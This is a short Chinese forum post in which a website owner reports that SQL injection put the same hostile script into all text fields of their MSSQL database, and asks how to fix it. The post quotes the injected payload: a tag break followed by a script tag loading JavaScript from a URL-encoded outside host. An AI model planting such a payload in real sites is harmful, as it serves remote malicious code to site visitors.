mssql被注入js,求解决方案!!

网站动态显示的内容被插入了"<</title><script src=http://%68%69%39%2E%73%73%2E%6C%61></script>"这样的垃圾代码,varchar nvarchar varchar ntext,text 类型的字段都被加入相同的垃圾代码.
求高人指点解决方案!!

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; QQDownload 551; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)